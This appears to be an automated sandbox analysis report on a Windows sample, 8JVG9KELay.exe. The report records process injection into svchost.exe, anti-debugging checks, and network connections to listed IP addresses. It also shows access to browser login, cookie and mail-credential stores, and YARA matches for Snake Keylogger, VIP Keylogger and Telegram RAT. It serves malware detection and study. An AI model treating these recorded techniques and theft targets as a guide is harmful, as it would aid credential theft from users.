Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597963	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596498	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596032	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595907	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595782	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594280	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594157	Jump to behavior

Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svchost.exe, 00000001.00000002.3764951839.000000000346B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\8JVG9KELay.exe	API call chain: ExitProcess graph end node	graph_0-98814
Source: C:\Users\user\Desktop\8JVG9KELay.exe	API call chain: ExitProcess graph end node	graph_0-98883
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_087A9698 LdrInitializeThunk,

1_2_087A9698

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_008541FD BlockInput,

0_2_008541FD

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_007E3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_007E3B4C

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_00815CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00815CCC

Source: C:\Windows\SysWOW64\svchost.exe

1_2_004019F0

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0085C304 LoadLibraryA,GetProcAddress,

0_2_0085C304

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007D3470 mov eax, dword ptr fs:[00000030h]	0_2_007D3470
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007D34D0 mov eax, dword ptr fs:[00000030h]	0_2_007D34D0
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007D1E70 mov eax, dword ptr fs:[00000030h]	0_2_007D1E70

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_008381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_008381F7

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0080A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0080A395
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0080A364 SetUnhandledExceptionFilter,	0_2_0080A364
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004123F1 SetUnhandledExceptionFilter,	1_2_004123F1

Source: C:\Windows\SysWOW64\svchost.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 158.101.44.242 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.80.1 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 31FE008

Jump to behavior

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_00838C93 LogonUserW,

0_2_00838C93

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_007E3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_007E3B4C

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_007E4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_007E4A35

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_00844EC9 mouse_event,

0_2_00844EC9

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8JVG9KELay.exe"

Jump to behavior

Source: C:\Users\user\Desktop\8JVG9KELay.exe

0_2_008381F7

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_00844C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00844C03

Source: 8JVG9KELay.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 8JVG9KELay.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0080886B cpuid

0_2_0080886B

Source: C:\Windows\SysWOW64\svchost.exe

Code function: GetLocaleInfoA,

1_2_00417A20

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_008150D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_008150D7

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_00822230 GetUserNameW,

0_2_00822230

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0081418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0081418A

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_007E4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007E4AFE

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: 8JVG9KELay.exe	Binary or memory string: WIN_81
Source: 8JVG9KELay.exe	Binary or memory string: WIN_XP
Source: 8JVG9KELay.exe	Binary or memory string: WIN_XPe
Source: 8JVG9KELay.exe	Binary or memory string: WIN_VISTA
Source: 8JVG9KELay.exe	Binary or memory string: WIN_7
Source: 8JVG9KELay.exe	Binary or memory string: WIN_8
Source: 8JVG9KELay.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
